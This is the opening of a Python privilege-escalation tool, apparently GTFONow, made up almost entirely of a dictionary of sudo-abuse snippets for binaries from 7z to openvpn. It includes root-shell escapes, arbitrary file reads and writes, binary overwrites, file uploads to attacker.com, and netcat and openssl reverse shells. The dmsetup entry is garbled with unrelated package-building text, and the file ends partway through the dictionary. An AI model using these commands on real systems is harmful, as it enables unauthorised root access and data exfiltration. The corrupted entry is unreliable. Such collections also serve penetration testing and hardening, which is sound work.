#!/usr/bin/env python # -*- coding: utf-8 -*- # https://github.com/Frissi0n/GTFONow # Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries. from __future__ import print_function import subprocess import getpass import os import argparse import sys import re import stat import grp import pwd import logging import platform import time import select # SUDO_BINS_START sudo_bins = { "7z": [ { "code": "LFILE=file_to_read\nsudo 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so\n" } ], "aa-exec": [ { "code": "sudo aa-exec /bin/sh" } ], "ab": [ { "code": "URL=http://attacker.com/\nLFILE=file_to_send\nsudo ab -p $LFILE $URL\n", "description": "Upload local file via HTTP POST request." } ], "alpine": [ { "code": "LFILE=file_to_read\nsudo alpine -F \"$LFILE\"\n" } ], "ansible-playbook": [ { "code": "TF=$(mktemp)\necho '[{hosts: localhost, tasks: [shell: /bin/sh /dev/tty 2>/dev/tty]}]' >$TF\nsudo ansible-playbook $TF\n" } ], "ansible-test": [ { "code": "sudo ansible-test shell" } ], "aoss": [ { "code": "sudo aoss /bin/sh" } ], "apache2ctl": [ { "code": "LFILE=file_to_read\nsudo apache2ctl -c \"Include $LFILE\" -k stop\n" } ], "apt": [ { "code": "sudo apt changelog apt\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." }, { "code": "TF=$(mktemp)\necho 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' > $TF\nsudo apt install -c $TF sl\n", "description": "For this to work the target package (e.g., `sl`) must not be installed." }, { "code": "sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh", "description": "When the shell exits the `update` command is actually executed." } ], "apt-get": [ { "code": "sudo apt-get changelog apt\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." 
}, { "code": "TF=$(mktemp)\necho 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' > $TF\nsudo apt-get install -c $TF sl\n", "description": "For this to work the target package (e.g., `sl`) must not be installed." }, { "code": "sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh", "description": "When the shell exits the `update` command is actually executed." } ], "ar": [ { "code": "TF=$(mktemp -u)\nLFILE=file_to_read\nsudo ar r \"$TF\" \"$LFILE\"\ncat \"$TF\"\n" } ], "aria2c": [ { "code": "COMMAND='id'\nTF=$(mktemp)\necho \"$COMMAND\" > $TF\nchmod +x $TF\nsudo aria2c --on-download-error=$TF http://x\n" } ], "arj": [ { "code": "TF=$(mktemp -d)\nLFILE=file_to_write\nLDIR=where_to_write\necho DATA >\"$TF/$LFILE\"\narj a \"$TF/a\" \"$TF/$LFILE\"\nsudo arj e \"$TF/a\" $LDIR\n", "description": "The archive can also be prepared offline then uploaded." } ], "arp": [ { "code": "LFILE=file_to_read\nsudo arp -v -f \"$LFILE\"\n" } ], "as": [ { "code": "LFILE=file_to_read\nsudo as @$LFILE\n" } ], "ascii-xfr": [ { "code": "LFILE=file_to_read\nsudo ascii-xfr -ns \"$LFILE\"\n" } ], "ascii85": [ { "code": "LFILE=file_to_read\nsudo ascii85 \"$LFILE\" | ascii85 --decode\n" } ], "ash": [ { "code": "sudo ash" } ], "aspell": [ { "code": "LFILE=file_to_read\nsudo aspell -c \"$LFILE\"\n" } ], "at": [ { "code": "echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | sudo at now; tail -f /dev/null\n" } ], "atobm": [ { "code": "LFILE=file_to_read\nsudo atobm $LFILE 2>&1 | awk -F \"'\" '{printf \"%s\", $2}'\n" } ], "awk": [ { "code": "sudo awk 'BEGIN {system(\"/bin/sh\")}'" } ], "aws": [ { "code": "sudo aws help\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." 
} ], "base32": [ { "code": "LFILE=file_to_read\nsudo base32 \"$LFILE\" | base32 --decode\n" } ], "base58": [ { "code": "LFILE=file_to_read\nsudo base58 \"$LFILE\" | base58 --decode\n" } ], "base64": [ { "code": "LFILE=file_to_read\nsudo base64 \"$LFILE\" | base64 --decode\n" } ], "basenc": [ { "code": "LFILE=file_to_read\nsudo basenc --base64 $LFILE | basenc -d --base64\n" } ], "basez": [ { "code": "LFILE=file_to_read\nsudo basez \"$LFILE\" | basez --decode\n" } ], "bash": [ { "code": "sudo bash" } ], "batcat": [ { "code": "sudo batcat --paging always /etc/profile\n!/bin/sh\n" } ], "bc": [ { "code": "LFILE=file_to_read\nsudo bc -s $LFILE\nquit\n" } ], "bconsole": [ { "code": "sudo bconsole\n@exec /bin/sh\n" } ], "bpftrace": [ { "code": "sudo bpftrace -e 'BEGIN {system(\"/bin/sh\");exit()}'" }, { "code": "TF=$(mktemp)\necho 'BEGIN {system(\"/bin/sh\");exit()}' >$TF\nsudo bpftrace $TF\n" }, { "code": "sudo bpftrace -c /bin/sh -e 'END {exit()}'" } ], "bridge": [ { "code": "LFILE=file_to_read\nsudo bridge -b \"$LFILE\"\n" } ], "bundle": [ { "code": "sudo bundle help\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "bundler": [ { "code": "sudo bundler help\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "busctl": [ { "code": "sudo busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'\n" } ], "busybox": [ { "code": "sudo busybox sh" } ], "byebug": [ { "code": "TF=$(mktemp)\necho 'system(\"/bin/sh\")' > $TF\nsudo byebug $TF\ncontinue\n" } ], "bzip2": [ { "code": "LFILE=file_to_read\nsudo bzip2 -c $LFILE | bzip2 -d\n" } ], "c89": [ { "code": "sudo c89 -wrapper /bin/sh,-s ." } ], "c99": [ { "code": "sudo c99 -wrapper /bin/sh,-s ." 
} ], "cabal": [ { "code": "sudo cabal exec -- /bin/sh" } ], "capsh": [ { "code": "sudo capsh --" } ], "cat": [ { "code": "LFILE=file_to_read\nsudo cat \"$LFILE\"\n" } ], "cdist": [ { "code": "sudo cdist shell -s /bin/sh" } ], "certbot": [ { "code": "TF=$(mktemp -d)\nsudo certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir $TF --work-dir $TF --config-dir $TF --pre-hook '/bin/sh 1>&0 2>&0'\n" } ], "check_by_ssh": [ { "code": "sudo check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C xx", "description": "The shell will only last 10 seconds." } ], "check_cups": [ { "code": "LFILE=file_to_read\nsudo check_cups --extra-opts=@$LFILE\n" } ], "check_log": [ { "code": "LFILE=file_to_write\nINPUT=input_file\nsudo check_log -F $INPUT -O $LFILE\n" } ], "check_memory": [ { "code": "LFILE=file_to_read\nsudo check_memory --extra-opts=@$LFILE\n" } ], "check_raid": [ { "code": "LFILE=file_to_read\nsudo check_raid --extra-opts=@$LFILE\n" } ], "check_ssl_cert": [ { "code": "COMMAND=id\nOUTPUT=output_file\nTF=$(mktemp)\necho \"$COMMAND | tee $OUTPUT\" > $TF\nchmod +x $TF\numask 022\ncheck_ssl_cert --curl-bin $TF -H example.net\ncat $OUTPUT\n", "description": "The host example.net must return a certificate via TLS" } ], "check_statusfile": [ { "code": "LFILE=file_to_read\nsudo check_statusfile $LFILE\n" } ], "chmod": [ { "code": "LFILE=file_to_change\nsudo chmod 6777 $LFILE\n" } ], "choom": [ { "code": "sudo choom -n 0 /bin/sh" } ], "chown": [ { "code": "LFILE=file_to_change\nsudo chown $(id -un):$(id -gn) $LFILE\n" } ], "chroot": [ { "code": "sudo chroot /\n" } ], "clamscan": [ { "code": "LFILE=file_to_read\nTF=$(mktemp -d)\ntouch $TF/empty.yara\nsudo clamscan --no-summary -d $TF -f $LFILE 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'\n" } ], "cmp": [ { "code": "LFILE=file_to_read\nsudo cmp $LFILE /dev/zero -b -l\n" } ], "cobc": [ { "code": "TF=$(mktemp -d)\necho 'CALL \"SYSTEM\" USING \"/bin/sh\".' 
> $TF/x\nsudo cobc -xFj --frelax-syntax-checks $TF/x\n" } ], "column": [ { "code": "LFILE=file_to_read\nsudo column $LFILE\n" } ], "comm": [ { "code": "LFILE=file_to_read\nsudo comm $LFILE /dev/null 2>/dev/null\n" } ], "composer": [ { "code": "TF=$(mktemp -d)\necho '{\"scripts\":{\"x\":\"/bin/sh -i 0<&3 1>&3 2>&3\"}}' >$TF/composer.json\nsudo composer --working-dir=$TF run-script x\n" } ], "cowsay": [ { "code": "TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\nsudo cowsay -f $TF x\n" } ], "cowthink": [ { "code": "TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\nsudo cowthink -f $TF x\n" } ], "cp": [ { "code": "LFILE=file_to_write\necho \"DATA\" | sudo cp /dev/stdin \"$LFILE\"\n" }, { "code": "LFILE=file_to_write\nTF=$(mktemp)\necho \"DATA\" > $TF\nsudo cp $TF $LFILE\n", "description": "This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)" }, { "code": "sudo cp /bin/sh /bin/cp\nsudo cp\n", "description": "This overrides `cp` itself with a shell (or any other executable) that is to be executed as root, useful in case a `sudo` rule allows to only run `cp` by path. Warning, this is a destructive action." } ], "cpan": [ { "code": "sudo cpan\n! exec '/bin/bash'\n" } ], "cpio": [ { "code": "echo '/bin/sh /dev/tty' >localhost\nsudo cpio -o --rsh-command /bin/sh -F localhost:\n" }, { "code": "LFILE=file_to_read\nTF=$(mktemp -d)\necho \"$LFILE\" | sudo cpio -R $UID -dp $TF\ncat \"$TF/$LFILE\"\n", "description": "The whole directory structure is copied to `$TF`." }, { "code": "LFILE=file_to_write\nLDIR=where_to_write\necho DATA >$LFILE\necho $LFILE | sudo cpio -R 0:0 -p $LDIR\n", "description": "Copies `$LFILE` to the `$LDIR` directory." 
} ], "cpulimit": [ { "code": "sudo cpulimit -l 100 -f /bin/sh" } ], "crash": [ { "code": "sudo crash -h\n!sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "crontab": [ { "code": "sudo crontab -e", "description": "The commands are executed according to the crontab file edited via the `crontab` utility." } ], "csh": [ { "code": "sudo csh" } ], "csplit": [ { "code": "LFILE=file_to_read\ncsplit $LFILE 1\ncat xx01\n" } ], "csvtool": [ { "code": "sudo csvtool call '/bin/sh;false' /etc/passwd" } ], "cupsfilter": [ { "code": "LFILE=file_to_read\nsudo cupsfilter -i application/octet-stream -m application/octet-stream $LFILE\n" } ], "curl": [ { "code": "URL=http://attacker.com/file_to_get\nLFILE=file_to_save\nsudo curl $URL -o $LFILE\n", "description": "Fetch a remote file via HTTP GET request." } ], "cut": [ { "code": "LFILE=file_to_read\nsudo cut -d \"\" -f1 \"$LFILE\"\n" } ], "dash": [ { "code": "sudo dash" } ], "date": [ { "code": "LFILE=file_to_read\nsudo date -f $LFILE\n" } ], "dc": [ { "code": "sudo dc -e '!/bin/sh'" } ], "dd": [ { "code": "LFILE=file_to_write\necho \"data\" | sudo dd of=$LFILE\n" } ], "debugfs": [ { "code": "sudo debugfs\n!/bin/sh\n" } ], "dialog": [ { "code": "LFILE=file_to_read\nsudo dialog --textbox \"$LFILE\" 0 0\n" } ], "diff": [ { "code": "LFILE=file_to_read\nsudo diff --line-format=%L /dev/null $LFILE\n" } ], "dig": [ { "code": "LFILE=file_to_read\nsudo dig -f $LFILE\n" } ], "distcc": [ { "code": "sudo distcc /bin/sh" } ], "dmesg": [ { "code": "sudo dmesg -H\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." 
} ], "dmidecode": [ { "code": "LFILE=file_to_write\nsudo dmidecode --no-sysfs -d x.dmi --dump-bin \"$LFILE\"\n", "description": "It can be used to overwrite files using a specially crafted SMBIOS file that can be read as a memory device by dmidecode.\nGenerate the file with [dmiwrite](https://github.com/adamreiser/dmiwrite) and upload it to the target.\n\n- `--dump-bin`, will cause dmidecode to write the payload to the destination specified, prepended with 32 null bytes.\n\n- `--no-sysfs`, if the target system is using an older version of dmidecode, you may need to omit the option.\n\n```\nmake dmiwrite\nTF=$(mktemp)\necho \"DATA\" > $TF\n./dmiwrite $TF x.dmi\n```\n" } ], "dmsetup": [ { "code": "sudo dmsetup create base < $TF/x.sh\nfpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF\n```\n" } ], "docker": [ { "code": "sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh", "description": "The resulting is a root shell." } ], "dosbox": [ { "code": "LFILE='\\path\\to\\file_to_write'\nsudo dosbox -c 'mount c /' -c \"echo DATA >c:$LFILE\" -c exit\n", "description": "Note that the name of the written file in the following example will be `FILE_TO_`. Also note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write." } ], "dotnet": [ { "code": "sudo dotnet fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;\n" } ], "dpkg": [ { "code": "sudo dpkg -l\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." }, { "code": "sudo dpkg -i x_1.0_all.deb", "description": "It runs an interactive shell using a specially crafted Debian package. 
Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'exec /bin/sh' > $TF/x.sh\nfpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF\n```\n" } ], "dstat": [ { "code": "echo 'import os; os.execv(\"/bin/sh\", [\"sh\"])' >/usr/local/share/dstat/dstat_xxx.py\nsudo dstat --xxx\n" } ], "dvips": [ { "code": "tex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\nsudo dvips -R0 texput.dvi\n" } ], "easy_install": [ { "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\nsudo easy_install $TF\n" } ], "eb": [ { "code": "sudo eb logs\n!/bin/sh\n" } ], "ed": [ { "code": "sudo ed\n!/bin/sh\n" } ], "efax": [ { "code": "LFILE=file_to_read\nsudo efax -d \"$LFILE\"\n" } ], "elvish": [ { "code": "sudo elvish" } ], "emacs": [ { "code": "sudo emacs -Q -nw --eval '(term \"/bin/sh\")'" } ], "enscript": [ { "code": "sudo enscript /dev/null -qo /dev/null -I '/bin/sh >&2'" } ], "env": [ { "code": "sudo env /bin/sh" } ], "eqn": [ { "code": "LFILE=file_to_read\nsudo eqn \"$LFILE\"\n" } ], "espeak": [ { "code": "LFILE=file_to_read\nsudo espeak -qXf \"$LFILE\"\n" } ], "ex": [ { "code": "sudo ex\n!/bin/sh\n" } ], "exiftool": [ { "code": "LFILE=file_to_write\nINPUT=input_file\nsudo exiftool -filename=$LFILE $INPUT\n" } ], "expand": [ { "code": "LFILE=file_to_read\nsudo expand \"$LFILE\"\n" } ], "expect": [ { "code": "sudo expect -c 'spawn /bin/sh;interact'" } ], "facter": [ { "code": "TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nsudo FACTERLIB=$TF facter\n" } ], "file": [ { "code": "LFILE=file_to_read\nsudo file -f $LFILE\n", "description": "Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation, so this may not be suitable for binary files." } ], "find": [ { "code": "sudo find . 
-exec /bin/sh \\; -quit" } ], "fish": [ { "code": "sudo fish" } ], "flock": [ { "code": "sudo flock -u / /bin/sh" } ], "fmt": [ { "code": "LFILE=file_to_read\nsudo fmt -999 \"$LFILE\"\n", "description": "This corrupts the output by wrapping very long lines at the given width." } ], "fold": [ { "code": "LFILE=file_to_read\nsudo fold -w99999999 \"$LFILE\"\n" } ], "fping": [ { "code": "LFILE=file_to_read\nsudo fping -f $LFILE\n" } ], "ftp": [ { "code": "sudo ftp\n!/bin/sh\n" } ], "gawk": [ { "code": "sudo gawk 'BEGIN {system(\"/bin/sh\")}'" } ], "gcc": [ { "code": "sudo gcc -wrapper /bin/sh,-s ." } ], "gcloud": [ { "code": "sudo gcloud help\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "gcore": [ { "code": "sudo gcore $PID" } ], "gdb": [ { "code": "sudo gdb -nx -ex '!sh' -ex quit" } ], "gem": [ { "code": "sudo gem open -e \"/bin/sh -c /bin/sh\" rdoc", "description": "This requires the name of an installed gem to be provided (`rdoc` is usually installed)." } ], "genie": [ { "code": "sudo genie -c '/bin/sh'" } ], "genisoimage": [ { "code": "LFILE=file_to_read\nsudo genisoimage -q -o - \"$LFILE\"\n" } ], "ghc": [ { "code": "sudo ghc -e 'System.Process.callCommand \"/bin/sh\"'" } ], "ghci": [ { "code": "sudo ghci\nSystem.Process.callCommand \"/bin/sh\"\n" } ], "gimp": [ { "code": "sudo gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'" } ], "ginsh": [ { "code": "sudo ginsh\n!/bin/sh\n" } ], "git": [ { "code": "sudo PAGER='sh -c \"exec sh 0<&1\"' git -p help" }, { "code": "sudo git -p help config\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." }, { "code": "sudo git branch --help config\n!/bin/sh\n", "description": "The help system can also be reached from any `git` command, e.g., `git branch`. 
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." }, { "code": "TF=$(mktemp -d)\ngit init \"$TF\"\necho 'exec /bin/sh 0<&2 1>&2' >\"$TF/.git/hooks/pre-commit.sample\"\nmv \"$TF/.git/hooks/pre-commit.sample\" \"$TF/.git/hooks/pre-commit\"\nsudo git -C \"$TF\" commit --allow-empty -m x\n", "description": "Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the `-C` option." }, { "code": "TF=$(mktemp -d)\nln -s /bin/sh \"$TF/git-x\"\nsudo git \"--exec-path=$TF\" x\n" } ], "grc": [ { "code": "sudo grc --pty /bin/sh" } ], "grep": [ { "code": "LFILE=file_to_read\nsudo grep '' $LFILE\n" } ], "gtester": [ { "code": "TF=$(mktemp)\necho '#!/bin/sh' > $TF\necho 'exec /bin/sh 0<&1' >> $TF\nchmod +x $TF\nsudo gtester -q $TF\n" } ], "gzip": [ { "code": "LFILE=file_to_read\nsudo gzip -f $LFILE -t\n" } ], "hd": [ { "code": "LFILE=file_to_read\nsudo hd \"$LFILE\"\n" } ], "head": [ { "code": "LFILE=file_to_read\nsudo head -c1G \"$LFILE\"\n" } ], "hexdump": [ { "code": "LFILE=file_to_read\nsudo hexdump -C \"$LFILE\"\n" } ], "highlight": [ { "code": "LFILE=file_to_read\nsudo highlight --no-doc --failsafe \"$LFILE\"\n" } ], "hping3": [ { "code": "sudo hping3\n/bin/sh\n" }, { "code": "RHOST=attacker.com\nLFILE=file_to_read\nsudo hping3 \"$RHOST\" --icmp --data 500 --sign xxx --file \"$LFILE\"\n", "description": "The file is continuously sent, adjust the `--count` parameter or kill the sender when done. 
Receive on the attacker box with:\n\n```\nsudo hping3 --icmp --listen xxx --dump\n```\n" } ], "iconv": [ { "code": "LFILE=file_to_read\n./iconv -f 8859_1 -t 8859_1 \"$LFILE\"\n" } ], "iftop": [ { "code": "sudo iftop\n!/bin/sh\n" } ], "install": [ { "code": "LFILE=file_to_change\nTF=$(mktemp)\nsudo install -m 6777 $LFILE $TF\n" } ], "ionice": [ { "code": "sudo ionice /bin/sh" } ], "ip": [ { "code": "LFILE=file_to_read\nsudo ip -force -batch \"$LFILE\"\n" }, { "code": "sudo ip netns add foo\nsudo ip netns exec foo /bin/sh\nsudo ip netns delete foo\n", "description": "This only works for Linux with CONFIG_NET_NS=y." }, { "code": "sudo ip netns add foo\nsudo ip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar\nsudo ip netns exec bar /bin/sh\nsudo ip netns delete foo\nsudo ip netns delete bar\n", "description": "This only works for Linux with CONFIG_NET_NS=y. This version also grants network access." } ], "irb": [ { "code": "sudo irb\nexec '/bin/bash'\n" } ], "ispell": [ { "code": "sudo ispell /etc/passwd\n!/bin/sh\n" } ], "jjs": [ { "code": "echo \"Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()\" | sudo jjs" } ], "joe": [ { "code": "sudo joe\n^K!/bin/sh\n" } ], "join": [ { "code": "LFILE=file_to_read\nsudo join -a 2 /dev/null $LFILE\n" } ], "journalctl": [ { "code": "sudo journalctl\n!/bin/sh\n" } ], "jq": [ { "code": "LFILE=file_to_read\nsudo jq -Rr . 
\"$LFILE\"\n" } ], "jrunscript": [ { "code": "sudo jrunscript -e \"exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')\"" } ], "jtag": [ { "code": "sudo jtag --interactive\nshell /bin/sh\n" } ], "julia": [ { "code": "sudo julia -e 'run(`/bin/sh`)'\n" } ], "knife": [ { "code": "sudo knife exec -E 'exec \"/bin/sh\"'\n" } ], "ksh": [ { "code": "sudo ksh" } ], "ksshell": [ { "code": "LFILE=file_to_read\nsudo ksshell -i $LFILE\n" } ], "ksu": [ { "code": "sudo ksu -q -e /bin/sh" } ], "kubectl": [ { "code": "LFILE=dir_to_serve\nsudo kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/\n" } ], "latex": [ { "code": "sudo latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{file_to_read}\\end{document}'\nstrings article.dvi\n", "description": "The read file will be part of the output." }, { "code": "sudo latex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n" } ], "latexmk": [ { "code": "sudo latexmk -e 'exec \"/bin/sh\";'" } ], "ld.so": [ { "code": "sudo /lib/ld.so /bin/sh" } ], "ldconfig": [ { "code": "TF=$(mktemp -d)\necho \"$TF\" > \"$TF/conf\"\n# move malicious libraries in $TF\nsudo ldconfig -f \"$TF/conf\"\n", "description": "This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries." 
} ], "less": [ { "code": "sudo less /etc/profile\n!/bin/sh\n" } ], "lftp": [ { "code": "sudo lftp -c '!/bin/sh'" } ], "ln": [ { "code": "sudo ln -fs /bin/sh /bin/ln\nsudo ln\n" } ], "loginctl": [ { "code": "sudo loginctl user-status\n!/bin/sh\n" } ], "logsave": [ { "code": "sudo logsave /dev/null /bin/sh -i" } ], "look": [ { "code": "LFILE=file_to_read\nsudo look '' \"$LFILE\"\n" } ], "ltrace": [ { "code": "sudo ltrace -b -L /bin/sh" } ], "lua": [ { "code": "sudo lua -e 'os.execute(\"/bin/sh\")'" } ], "lualatex": [ { "code": "sudo lualatex -shell-escape '\\documentclass{article}\\begin{document}\\directlua{os.execute(\"/bin/sh\")}\\end{document}'" } ], "luatex": [ { "code": "sudo luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'" } ], "lwp-download": [ { "code": "URL=http://attacker.com/file_to_get\nLFILE=file_to_save\nsudo lwp-download $URL $LFILE\n" } ], "lwp-request": [ { "code": "LFILE=file_to_read\nsudo lwp-request \"file://$LFILE\"\n" } ], "mail": [ { "code": "sudo mail --exec='!/bin/sh'", "description": "GNU version only." } ], "make": [ { "code": "COMMAND='/bin/sh'\nsudo make -s --eval=$'x:\\n\\t-'\"$COMMAND\"\n" } ], "man": [ { "code": "sudo man man\n!/bin/sh\n" } ], "mawk": [ { "code": "sudo mawk 'BEGIN {system(\"/bin/sh\")}'" } ], "minicom": [ { "code": "sudo minicom -D /dev/null\n", "description": "Start the following command to open the TUI interface, then:\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\nAfter the shell, exit with `Ctrl-A x`.\n" } ], "more": [ { "code": "TERM= sudo more /etc/profile\n!/bin/sh\n" } ], "mosquitto": [ { "code": "LFILE=file_to_read\nsudo mosquitto -c \"$LFILE\"\n" } ], "mount": [ { "code": "sudo mount -o bind /bin/sh /bin/mount\nsudo mount\n", "description": "Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell." 
} ], "msfconsole": [ { "code": "sudo msfconsole\nmsf6 > irb\n>> system(\"/bin/sh\")\n" } ], "msgattrib": [ { "code": "LFILE=file_to_read\nsudo msgattrib -P $LFILE\n" } ], "msgcat": [ { "code": "LFILE=file_to_read\nsudo msgcat -P $LFILE\n" } ], "msgconv": [ { "code": "LFILE=file_to_read\nsudo msgconv -P $LFILE\n" } ], "msgfilter": [ { "code": "echo x | sudo msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'\n", "description": "Any text file will do as the input (use `-i`). `kill` is needed to spawn the shell only once." } ], "msgmerge": [ { "code": "LFILE=file_to_read\nsudo msgmerge -P $LFILE /dev/null\n" } ], "msguniq": [ { "code": "LFILE=file_to_read\nsudo msguniq -P $LFILE\n" } ], "mtr": [ { "code": "LFILE=file_to_read\nsudo mtr --raw -F \"$LFILE\"\n" } ], "multitime": [ { "code": "sudo multitime /bin/sh" } ], "mv": [ { "code": "LFILE=file_to_write\nTF=$(mktemp)\necho \"DATA\" > $TF\nsudo mv $TF $LFILE\n" } ], "mysql": [ { "code": "sudo mysql -e '\\! /bin/sh'" } ], "nano": [ { "code": "sudo nano\n^R^X\nreset; sh 1>&0 2>&0\n" } ], "nasm": [ { "code": "LFILE=file_to_read\nsudo nasm -@ $LFILE\n" } ], "nawk": [ { "code": "sudo nawk 'BEGIN {system(\"/bin/sh\")}'" } ], "nc": [ { "code": "RHOST=attacker.com\nRPORT=12345\nsudo nc -e /bin/sh $RHOST $RPORT\n", "description": "Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional." } ], "ncdu": [ { "code": "sudo ncdu\nb\n" } ], "ncftp": [ { "code": "sudo ncftp\n!/bin/sh\n" } ], "neofetch": [ { "code": "TF=$(mktemp)\necho 'exec /bin/sh' >$TF\nsudo neofetch --config $TF\n" } ], "nft": [ { "code": "LFILE=file_to_read\nsudo nft -f \"$LFILE\"\n" } ], "nice": [ { "code": "sudo nice /bin/sh" } ], "nl": [ { "code": "LFILE=file_to_read\nsudo nl -bn -w1 -s '' $LFILE\n" } ], "nm": [ { "code": "LFILE=file_to_read\nsudo nm @$LFILE\n" } ], "nmap": [ { "code": "TF=$(mktemp)\necho 'os.execute(\"/bin/sh\")' > $TF\nsudo nmap --script=$TF\n", "description": "Input echo is disabled." 
}, { "code": "sudo nmap --interactive\nnmap> !sh\n", "description": "The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands." } ], "node": [ { "code": "sudo node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n" } ], "nohup": [ { "code": "sudo nohup /bin/sh -c \"sh <$(tty) >$(tty) 2>$(tty)\"" } ], "npm": [ { "code": "TF=$(mktemp -d)\necho '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' > $TF/package.json\nsudo npm -C $TF --unsafe-perm i\n", "description": "Additionally, arbitrary script names can be used in place of `preinstall` and triggered by name with, e.g., `npm -C $TF run preinstall`." } ], "nroff": [ { "code": "TF=$(mktemp -d)\necho '#!/bin/sh' > $TF/groff\necho '/bin/sh' >> $TF/groff\nchmod +x $TF/groff\nsudo GROFF_BIN_PATH=$TF nroff\n" } ], "nsenter": [ { "code": "sudo nsenter /bin/sh" } ], "ntpdate": [ { "code": "LFILE=file_to_read\nsudo ntpdate -a x -k $LFILE -d localhost\n" } ], "octave": [ { "code": "sudo octave-cli --eval 'system(\"/bin/sh\")'" } ], "od": [ { "code": "LFILE=file_to_read\nsudo od -An -c -w9999 \"$LFILE\"\n" } ], "openssl": [ { "code": "RHOST=attacker.com\nRPORT=12345\nmkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s\n", "description": "To receive the shell run the following on the attacker box:\n\n openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\n openssl s_server -quiet -key key.pem -cert cert.pem -port 12345\n\nCommunication between attacker and target will be encrypted.\n" } ], "openvpn": [ { "code": "sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh'\n" }, { "code": "LFILE=file_to_read\nsudo openvpn --config \"$LFILE\"\n", "description": "The file is actually parsed and the first partial wrong line is returned in an error message." 
